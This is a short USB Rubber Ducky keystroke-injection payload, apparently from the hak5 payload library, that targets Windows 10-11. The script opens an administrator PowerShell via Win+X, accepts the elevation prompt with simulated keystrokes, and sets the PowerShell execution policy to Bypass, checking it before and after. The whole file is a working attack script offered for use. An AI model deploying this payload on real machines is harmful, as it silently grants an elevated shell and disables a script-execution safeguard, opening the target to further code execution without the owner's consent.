REM ####################################################################################
REM #                                                                                  |
REM # Title        : Starting a PowerShell with administrator permissions in Windows   |
REM # Author       : Aleff                                                             |
REM # Version      : 1.0                                                               |
REM # Category     : Execute                                                           |
REM # Target       : Windows 10-11                                                     |
REM #                                                                                  |
REM ####################################################################################
REM https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows
REM Requirements:
REM     - Nothing

DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFTARROW
DELAY 500
ENTER

DELAY 2000
STRING Get-ExecutionPolicy -List
ENTER

DELAY 500
STRING Set-ExecutionPolicy Bypass
ENTER

DELAY 500
STRING Get-ExecutionPolicy -List
ENTER
